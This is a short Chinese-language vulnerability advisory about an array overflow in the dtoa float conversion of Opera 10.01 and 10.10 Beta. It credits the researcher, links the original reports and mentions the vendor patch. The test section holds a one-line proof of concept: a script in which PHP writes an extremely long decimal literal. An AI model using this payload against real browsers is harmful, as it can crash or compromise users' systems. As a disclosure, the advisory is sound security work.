受影响系统:
Opera Software Opera 10.10 Beta
Opera Software Opera 10.01
描述:
Opera是一款流行的WEB浏览器,支持多种平台。
Opera的dtoa实现处理浮点数转换时存在数组溢出漏洞。在src/lib/libc/gdtoa/gdtoaimp.h中:
– —gdtoaimp.h—
…
#define Kmax 15
…
– —gdtoaimp.h—
最大的Kmax长度为15,如果提供了更大的值(如17),程序就会溢出freelist数组。
<*来源:Maksymilian Arciemowicz (max@jestsuper.pl)
链接:http://secunia.com/advisories/37431/
http://marc.info/?l=bugtraq&m=125873210221041&w=2
*>
测试方法:
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!– ———————–
<script>
var a=0.<?php echo str_repeat("1",296450); ?>;
</script>
– ———————–
建议: 厂商补丁:
Opera Software
————–
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
0 条评论。